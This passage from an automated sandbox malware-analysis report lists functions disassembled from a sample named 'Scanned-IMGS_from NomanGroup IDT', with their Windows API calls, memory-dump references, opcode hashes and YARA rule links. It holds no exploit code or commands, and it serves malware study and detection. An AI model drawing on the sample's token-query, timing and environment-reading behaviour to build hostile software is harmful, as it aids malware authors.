                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: 452e1be08ff62ba4cafc211acda8119206dad9cd250aad6cb627c26e3a3bbccd
                                                                                • Instruction ID: f3977322c7edcb369f810050333e0939211247eedf678b8cd2628485cb69d0cc
                                                                                • Opcode Fuzzy Hash: 452e1be08ff62ba4cafc211acda8119206dad9cd250aad6cb627c26e3a3bbccd
                                                                                • Instruction Fuzzy Hash: DD21A175600204AFD704EF69C894EAEBBE5EF44704F00807EE84ADB362DB34AC05CB94
                                                                                Function 0048CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0048CDC6
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048CDE9
                                                                                  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0048CE0F
                                                                                • _free.LIBCMT ref: 0048CE22
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048CE31
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: cff37b1021203a4c7c984b9f212cee9aee39ff7b70cfd21175b84603f2658f87
                                                                                • Instruction ID: 8731bd927e151461863007937a881e210c9f941fade8ab3ba0f58189c6c80b24
                                                                                • Opcode Fuzzy Hash: cff37b1021203a4c7c984b9f212cee9aee39ff7b70cfd21175b84603f2658f87
                                                                                • Instruction Fuzzy Hash: 9D01D4726012557F23213ABA6CC8C7F696DDFC6BA1315052FFD05C7201EA788D0283B8
                                                                                Function 00469639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00469693
                                                                                • SelectObject.GDI32(?,00000000), ref: 004696A2
                                                                                • BeginPath.GDI32(?), ref: 004696B9
                                                                                • SelectObject.GDI32(?,00000000), ref: 004696E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: feb6a1463d2ebd40287c37fc6d4b90bb8ac2cccdc7f7a4cc3db4c80ea62712a9
                                                                                • Instruction ID: e6407285554fd42b592b9c672f0ce0035e457a91f10de16a4e1503a1f05393c1
                                                                                • Opcode Fuzzy Hash: feb6a1463d2ebd40287c37fc6d4b90bb8ac2cccdc7f7a4cc3db4c80ea62712a9
                                                                                • Instruction Fuzzy Hash: 05214C70802749EBDB219F64DC447AB7B69BF32315F100226F410961B1E3B85C9BEB9E
                                                                                Function 004B5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _memcmp
                                                                                • String ID:
                                                                                • API String ID: 2931989736-0
                                                                                • Opcode ID: 0a9dca4f37dc450cb5ae7afae9aa81646e32d39eb1eb10b77513d8250a021b76
                                                                                • Instruction ID: f85a4c261ad5d736144c7814db7d4c1b5ff4d5e86f5d40c1764f9d3e3bcb4b11
                                                                                • Opcode Fuzzy Hash: 0a9dca4f37dc450cb5ae7afae9aa81646e32d39eb1eb10b77513d8250a021b76
                                                                                • Instruction Fuzzy Hash: 22019671741605BAB20855169D42FFBB35C9B21399F204037FD089A641FA6CEE1582BD
                                                                                Function 00482DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,?,0047F2DE,00483863,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6), ref: 00482DFD
                                                                                • _free.LIBCMT ref: 00482E32
                                                                                • _free.LIBCMT ref: 00482E59
                                                                                • SetLastError.KERNEL32(00000000,00451129), ref: 00482E66
                                                                                • SetLastError.KERNEL32(00000000,00451129), ref: 00482E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: e775ae2ee1c24b00ca2220bbb8fe5b441c375fcd14d6c183d7be70036352f7f2
                                                                                • Instruction ID: ca19448120cee76e731c09f37ea18e034953b99fbb6613b60ae7a966b394a3d3
                                                                                • Opcode Fuzzy Hash: e775ae2ee1c24b00ca2220bbb8fe5b441c375fcd14d6c183d7be70036352f7f2
                                                                                • Instruction Fuzzy Hash: 7C01D67228560067861237396E85D3F1559AFD1769B214C2BF825A22D3EBAC8802832C
                                                                                Function 004B000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?,?,004B035E), ref: 004B002B
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0046
                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0054
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?), ref: 004B0064
                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004AFF41,80070057,?,?), ref: 004B0070
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: 33888b51a7025070253a6932a2c96c38b73bef0e4034cc1f1bf643e9e34d7c02
                                                                                • Instruction ID: d6c30c212f01e256d5a4e418107867a1aa0ca3134124eebec1af544975e0b167
                                                                                • Opcode Fuzzy Hash: 33888b51a7025070253a6932a2c96c38b73bef0e4034cc1f1bf643e9e34d7c02
                                                                                • Instruction Fuzzy Hash: 4F018B72600204BFDB116F68EC84BEB7AADFB44793F144125F905EA211EB79DD418BA4
                                                                                Function 004BE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004BE997
                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 004BE9A5
                                                                                • Sleep.KERNEL32(00000000), ref: 004BE9AD
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004BE9B7
                                                                                • Sleep.KERNEL32 ref: 004BE9F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: d7a781e61fb6d1acf8758fa38b3048727936a6ab5adf6455ef6d04c43d38183e
                                                                                • Instruction ID: 314cb6233a28e0b787f67797ae1da2031fbaddf6509e89d5165a76f4e9edd6d3
                                                                                • Opcode Fuzzy Hash: d7a781e61fb6d1acf8758fa38b3048727936a6ab5adf6455ef6d04c43d38183e
                                                                                • Instruction Fuzzy Hash: 51012D71C01529DBCF009FE6DD996EDFB78FF49701F000556E502B6241CB38955ACBAA
                                                                                Function 004B10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B1114
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1120
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B112F
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1136
                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B114D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 842720411-0
                                                                                • Opcode ID: 6ce605d21eddaaee77b9d662d49912067baf266a5483eb880188bd677b70bd7f
                                                                                • Instruction ID: 47ce42ff8fc2d64c3f5421635dbffcb67a450f964b79e9977aca82d2b1dfad9b
                                                                                • Opcode Fuzzy Hash: 6ce605d21eddaaee77b9d662d49912067baf266a5483eb880188bd677b70bd7f
                                                                                • Instruction Fuzzy Hash: BF011D75100205BFDB114FA9DC99AAB3B6EEF8A360B504429FA45D7361DA31DC019A74
                                                                                Function 004B0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B0FCA
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B0FD6
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B0FE5
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B0FEC
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B1002
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: cd505c0b8730582cd31cb3585e9a3a9f1898ad58741a3f97894d915453a00b7e
                                                                                • Instruction ID: 9566d6453651bfeddf8f800533ad73362c86cbd6c40233cda28abafa6308174c
                                                                                • Opcode Fuzzy Hash: cd505c0b8730582cd31cb3585e9a3a9f1898ad58741a3f97894d915453a00b7e
                                                                                • Instruction Fuzzy Hash: 92F0A935200345ABDB211FA49CCDF973BADEF8A762F500425FE05DA262CA30DC418A64
                                                                                Function 004B1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B102A
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B1036
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1045
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B104C
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B1062
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 8936425d9f12a3b5c14f6e9f53aff1ee0258b22a36c2be5faf62448deb67c76c
                                                                                • Instruction ID: 2afbcc1854334d6b66663703475c19669976815423687b6de2599575f595de55
                                                                                • Opcode Fuzzy Hash: 8936425d9f12a3b5c14f6e9f53aff1ee0258b22a36c2be5faf62448deb67c76c
                                                                                • Instruction Fuzzy Hash: 63F0CD35200341EBDB212FA4ECD8F973BADEF8A761F100425FE05EB261CA30D8418A74
                                                                                Function 004C030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0324
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0331
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C033E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C034B
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0358
                                                                                • CloseHandle.KERNEL32(?,?,?,?,004C017D,?,004C32FC,?,00000001,00492592,?), ref: 004C0365
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 204aa1a763946fa0f1e05a3b7dc12b7f3c628e5ca66d4685899d8c67b73c38d4
                                                                                • Instruction ID: 985e538c2df6f0c97780b6239d63644c01876dd86561b3278f7b09693f1fdd63
                                                                                • Opcode Fuzzy Hash: 204aa1a763946fa0f1e05a3b7dc12b7f3c628e5ca66d4685899d8c67b73c38d4
                                                                                • Instruction Fuzzy Hash: A401DC76800B81CFCB30AF66D880813FBF9BF602153048A3FD59252A31C3B4A949CE84
                                                                                Function 0048D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0048D752
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 0048D764
                                                                                • _free.LIBCMT ref: 0048D776
                                                                                • _free.LIBCMT ref: 0048D788
                                                                                • _free.LIBCMT ref: 0048D79A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 67c216abdaa2063e021cc9723780b37122cf033d08518f76fdc0bdbba978a87b
                                                                                • Instruction ID: cb241760b06db882ea1c6bf228bf9f05597ab54ef16dd6cc4b2b4a160dbf744e
                                                                                • Opcode Fuzzy Hash: 67c216abdaa2063e021cc9723780b37122cf033d08518f76fdc0bdbba978a87b
                                                                                • Instruction Fuzzy Hash: B3F04FB2A41204AB8621FB69FAC1C5F7BEDBB04310B954C0BF049D7642C72DFC808768
                                                                                Function 004B5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004B5C58
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 004B5C6F
                                                                                • MessageBeep.USER32(00000000), ref: 004B5C87
                                                                                • KillTimer.USER32(?,0000040A), ref: 004B5CA3
                                                                                • EndDialog.USER32(?,00000001), ref: 004B5CBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 87bd2b6aa4324dbdd151b613b120ac71108dd1d3c4bf8b77c272c6c8f20a080a
                                                                                • Instruction ID: 991dfa8aa43a5e132f54f8773face458731c0a47ecce11af0d85ddac589fc5ea
                                                                                • Opcode Fuzzy Hash: 87bd2b6aa4324dbdd151b613b120ac71108dd1d3c4bf8b77c272c6c8f20a080a
                                                                                • Instruction Fuzzy Hash: 97018B305007449BFB205B20DDCEFE7BBB9BF00705F00066AA543A50E1D7F469458A99
                                                                                Function 004822A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 004822BE
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • _free.LIBCMT ref: 004822D0
                                                                                • _free.LIBCMT ref: 004822E3
                                                                                • _free.LIBCMT ref: 004822F4
                                                                                • _free.LIBCMT ref: 00482305
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 4b9d9d4beb7ffb054854075998280dd095edf8c611501786b29764f147457e1e
                                                                                • Instruction ID: 86e0de0a3a47c05eaa7089e61b3b54e273a57fc7bf72faf113da79f4d3f6d4fa
                                                                                • Opcode Fuzzy Hash: 4b9d9d4beb7ffb054854075998280dd095edf8c611501786b29764f147457e1e
                                                                                • Instruction Fuzzy Hash: 69F030F85815109B8622BF55BE4184D3F64BB3A750701294BF410D22B2C7791457BBAC
                                                                                Function 004695C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EndPath.GDI32(?), ref: 004695D4
                                                                                • StrokeAndFillPath.GDI32(?,?,004A71F7,00000000,?,?,?), ref: 004695F0
                                                                                • SelectObject.GDI32(?,00000000), ref: 00469603
                                                                                • DeleteObject.GDI32 ref: 00469616
                                                                                • StrokePath.GDI32(?), ref: 00469631
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                • String ID:
                                                                                • API String ID: 2625713937-0
                                                                                • Opcode ID: d1f44561877719925fdcf06bd984d838db263a7980c34530c27b2ff103adb97b
